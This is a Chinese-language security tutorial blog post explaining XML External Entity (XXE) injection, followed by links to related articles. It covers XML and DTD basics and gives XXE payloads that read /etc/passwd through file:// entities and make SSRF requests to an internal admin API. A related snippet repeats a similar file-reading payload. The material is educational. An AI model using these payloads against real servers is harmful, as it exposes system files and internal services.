XXE漏洞

原创 于 2025-06-11 22:35:52 发布 · 921 阅读 · 19 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #网络安全 #CTF #安全

1. 什么是 XXE(XML External Entity)?

XXE 全称:XML 外部实体注入(XML External Entity Injection)

是指攻击者向 XML 文档中注入恶意的“实体”,利用 XML 解析器的 外部实体(External Entity) 功能,达到读取敏感文件、发起网络请求甚至 DoS 攻击的目的。

1.1. XML的定义

XML由3个部分构成,它们分别是:文档类型定义(Document Type Definition,DTD),即XML的布局语言;可扩展的样式语言(Extensible Style Language,XSL),即XML的样式表语言;以及可扩展链接语言(Extensible Link Language,XLL)。

XML:可扩展标记语言,标准通用标记语言的子集,是一种用于标记电子文件使其具有结构性的标记语言。它被设计用来传输和存储数据(而不是储存数据),可扩展标记语言是一种很像超文本标记语言的标记语言。它的设计宗旨是传输数据,而不是显示数据。它的标签没有被预定义。您需要自行定义标签。它被设计为具有自我描述性。它是W3C的推荐标准。

可扩展标记语言(XML)和超文本标记语言(HTML)为不同的目的而设计

它被设计用来传输和存储数据,其焦点是数据的内容。

超文本标记语言被设计用来显示数据,其焦点是数据的外观

1.2. XML的作用

XML使用元素和属性来描述数 据。在数据传送过程中,XML始终保留了诸如父/子关系这样的数据结构。几个应用程序 可以共享和解析同一个XML文件,不必使用传统的字符串解析或拆解过程。 相反,普通文件不对每个数据段做描述(除了在头文件中),也不保留数据关系结构。使用XML做数据交换可以使应用程序更具有弹性,因为可以用位置(与普通文件一样)或用元素名(从数据库)来存取XML数据。

1.3. xml格式说明

XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素

<?xml version="1.0" encoding="UTF-8"?>
<!-- ⬆XML声明⬆ -->
<!DOCTYPE  文件名 [
<!ENTITY实体名 "实体内容">
]>
<!-- ⬆文档类型定义(DTD)⬆ -->
<元素名称 category="属性">
文本或其他元素
</元素名称>
<!-- ⬆文档元素⬆ -->

DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。DTD 可以在 XML 文档内声明,也可以外部引用。

(1)内部声明DTD

<!DOCTYPE 根元素 [元素声明]>

(2)引用外部DTD

<!DOCTYPE 根元素 SYSTEM "文件名">

或者

<!DOCTYPE 根元素 PUBLIC "public_ID" "文件名">

DTD实体是用于定义引用普通文本或特殊字符的快捷方式的变量,可以内部声明或外部引用。

(3)DTD的实体

DTD的作用

DTD(文档类型定义)的作用是定义XML文档的合法构建模块。DTD可以在XML文档内声明,也可以外部引用。

外部实体是指XML处理器必须解析的数据。它对于在多个文档之间创建共享的公共引用很有用。对外部实体进行的任何更改将在包含对其的引用的文档中自动更新。即XML使用外部实体将信息或“内容”将自动提取到XML文档的正文中。为此,我们需要在XML文档内部声明一个外部实体

DTD实体是用于定义引用普通文本或特殊字符的快捷方式的变量,可以内部声明或外部引用。

我们可以在内部确定其值(内部子集):

<!ENTITY AppSec "Appsec "Appsec-Labs">

或从外部来源(外部子集):

<!ENTITY AppSec SYSTEM "http://example.com/111.html

2. XXE 的利用原理

在标准 XML 中,可以使用 <!DOCTYPE> 来定义实体(Entity),包括:

  • 内部实体(Internal Entity)
  • 外部实体(External Entity)就是攻击的核心

比如,下面是一个合法的 XML 实体定义:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>

如果服务器使用一个 支持外部实体解析的 XML 解析器(如 libxml、Java XML parser),就会把 &xxe; 替换成 /etc/passwd 的内容!

3. 常见攻击类型(实战演示)

3.1. 读取本地文件(file协议)

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<user>
  <name>&xxe;</name>
</user>

效果:/etc/passwd 的内容插入 <name> 标签中

3.2. 发起 SSRF 请求(http协议)

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://internal-api.local/admin">
]>
<req>
  <data>&xxe;</data>
</req>

效果: XXE 被当作客户端发送请求,读取内部API内容 → 实现 SSRF(服务器端请求伪造)

XML外部实体(XXE)注入详解 - 渗透测试中心 - 博客园

Web安全测试(四):XML注入和代码注入
ml202187的博客
08-29 1346
**通过本章节,我们会学到:** 1. XML注入概念 2. 了解什么是XML注入漏洞 3. 了解XML注入漏洞产生的原因 4. XML注入漏洞检测与防护 5. 掌握XML注入漏洞的利用方式 6. 掌握如何修复XML注入漏洞 7. 代码注入概念 8. 代码注入的类型及防御
python解析外部实体_XML外部实体(XXE)注入详解
weixin_39818631的博客
12-04 684
###XML与xxe注入基础知识1.XMl定义XML由3个部分构成,它们分别是:文档类型定义(Document Type Definition,DTD),即XML的布局语言;可扩展的样式语言(Extensible Style Language,XSL),即XML的样式表语言;以及可扩展链接语言(Extensible Link Language,XLL)。XML:可扩展标记语言,标准通用标记语言的子...
python解析外部实体_XXE外部实体注入漏洞
weixin_39779975的博客
12-04 786
XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XML External Entity Injection,即xml外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫...
updateXML 注入 python 脚本
weixin_33725126的博客
06-21 179
用SLQMAP来跑updateXML注入发现拦截关键字,然后内联注入能绕,最后修改halfversionedmorekeywords.py脚本,结果SQLMAP还是跑不出来。>_< halfversionedmorekeywords.py脚本修改后如下: #!/usr/bin/env python import os import re from lib.co...
Python对XML进行操作
笔记流
02-07 666
1.构建xml文件# -*- coding: utf-8 -*- import xml.etree.ElementTree as ETroot = ET.Element("html") head = ET.SubElement(root, "head") title = ET.SubElement(head, "title") title.text = "Title"body = ET.SubEle
精选资源
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞利用 - 任意文件读取 无回显 XXE(XML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细...
精选资源
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE漏洞主要出现在应用接收并解析XML格式的数据时。如果服务器开启了外部实体加载功能,攻击者可以通过构造含有恶意外部实体的XML文档,诱使服务器去读取或执行非预期的资源。比如,攻击者可以定义一个外部实体来...
精选资源
5、XXE漏洞pdf资料
10-15
XXE(XML External Entity)漏洞是针对XML解析器的安全漏洞,它发生在XML解析器处理包含外部实体引用的...开发人员应采取适当的安全措施,确保XML解析过程安全,以防止攻击者通过XXE漏洞获取敏感信息或执行恶意操作。
网络安全_XXE漏洞_多语言演示环境_教育研究_1741858468.zip
03-14
XXE漏洞允许攻击者通过插入恶意的XML实体来执行服务器端的代码,从而达到获取敏感信息、拒绝服务或进行远程代码执行等目的。由于其潜在的破坏力,针对XXE漏洞的防范和教育研究显得尤为重要。 在教育研究方面,通过...
105-web漏洞挖掘之XXE漏洞1
08-03
XXE漏洞详解】 XXE,全称为XML External Entity Injection,是XML解析器在处理XML输入时因未能正确配置,允许加载外部实体而导致的安全漏洞。这类漏洞允许攻击者注入恶意的XML外部实体,进而获取敏感信息、执行...
python编写的面向对象的XXE自动化检测工具(对单个功能进行检测)
weixin_30555753的博客
11-06 298
import XXE_check if __name__=="__main__": try: check=XXE_check.xxe_check() #登录 input_url="http://mail.richinfo.cn/" getLoginUrl="http://mail.richinfo.cn/web...
Python操作XML教程:读取、写入、修改和保存XML文档
热门推荐
专注于Python编程技术的分享与交流,致力于帮助开发者提升编程技能,解决实际问题,探索Python的无限可能。
05-22 3万+
XML是一种常见的数据交换格式,在许多应用中都被广泛使用。通过掌握Python操作XML的基础知识,您将能够轻松地处理XML数据,从而实现数据的提取、修改和存储。这是一个简单的Python操作XML的教程,涵盖了读取、写入、修改和保存XML文档的基本步骤。通过遍历根元素和其子元素,可以访问XML文档中的各个元素和其属性。模块,该模块提供了解析和操作XML文档的功能。方法将修改后的XML文档保存到文件中。函数解析XML文档。对象,表示整个XML文档的树结构。属性修改元素的文本内容,使用。方法修改元素的属性。
python解析外部实体_使用Python解析外部实体引用解析XML
weixin_39872123的博客
12-04 320
我要为lxml负责。如果可以使用lxml,就没有理由考虑ElementTree。在我认为您缺少的部分是XMLParser中的no_network=False;它是{a1}。在示例。。。在XML输入(测试.xml)在%ISOEntities;]>Here's a test of minus: −Python^{pr2}$输出Here's a test of minus: −如果希望保留实体引用...
微信支付的安全漏洞XXE
weixin_33826268的博客
07-05 206
1.场景:国外安全社区公布微信支付官方SDK存在严重漏洞,可导致商家服务器被入侵(绕过支付的效果)。目前,漏洞详细信息以及攻击方式已被公开,影响范围巨大(已确认陌陌、vivo因使用该SDK而存在该漏洞),建议用到JAVA SDK的商户快速检查并修复。 2.什么是XML外部实体注入(XML External Entity,简称XXE)? 当允许引用外部实体时,通过构造恶意内容,可导致读取任意文件...
在Python中将XML / HTML实体转换为Unicode字符串如何实现?
weixin_43343144的博客
05-13 344
参考文档:https://cloud.tencent.com/developer/ask/52113 实际例子: 比如【&#8220;我是实体&#8221;标题】实际标题为【“我是实体”标题】需通过HTML实体解码 from html import parser print(parser.unescape("&#8220;我是实体&#8221;标题")) ...
XXE靶机
haha1314的博客
08-10 742
一、 收集信息 存活主机 开放端口 存在注入 Post包里面添加 <?xml version=“1.0″ encoding=“UTF-8″?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY admin SYSTEM "file:///etc/passwd"> ]> <root><n...
python解析外部实体_如何获得一个平面XML,以便外部实体合并到顶部
weixin_33741534的博客
01-30 101
我知道这是一个边界问题,无论它是真的属于stackoverflow还是superuser,但似乎这里有很多“编辑代码”的问题,我把它贴在SO上。在我有一堆XML文件,有人用他们无限的智慧决定用这些标记将它们分解成多个文件,这使得调试/编辑它们成为一个巨大的p-I-t-a。因此,我要寻找:VIM中的一种在单个缓冲区中打开它们的方法(最好是将更改保存在正确的外部实体文件中),或者一种在VIM中扩展文件...
XXE
frinck的博客
11-01 1268
1.XML 什么是xml,他是用来干什么的? xml(xtensible markup language),可扩展标记语言,其实就是一种传输文本的格式,他的格式和html的格式非常相似,通常是来做配置文件和存贮数据。而后来出现了json,json速度更快而被广泛使用 xml的内部实体和外部实体的格式是什么样子的 如图就是一个典型的xml文本: 格式:xml声明:<?xml...
XXE详解
qq_48904485的博客
03-22 5773
一、XML基础知识 1、XML简介: XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素 XML 和 HTML 为不同的目的而设计: XML 被设计用来传输和存储数据,其焦点是数据的内容。 HTML 被设计用来显示数据,其焦点是数据的外观。 HTML 旨在显示信息,而 XML 旨在传输信息。 2、XML 语法 1)XML 声明文件的可选部分,如果存在需要放在文
xxe漏洞
最新发布
07-21
### XXE漏洞原理 XXE(XML External Entity)漏洞是一种由于应用程序在解析XML输入时允许引用外部实体而导致的安全漏洞。XML是一种结构化文档格式,广泛用于数据存储和传输,其中“外部实体”是XML标准中允许的一种...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值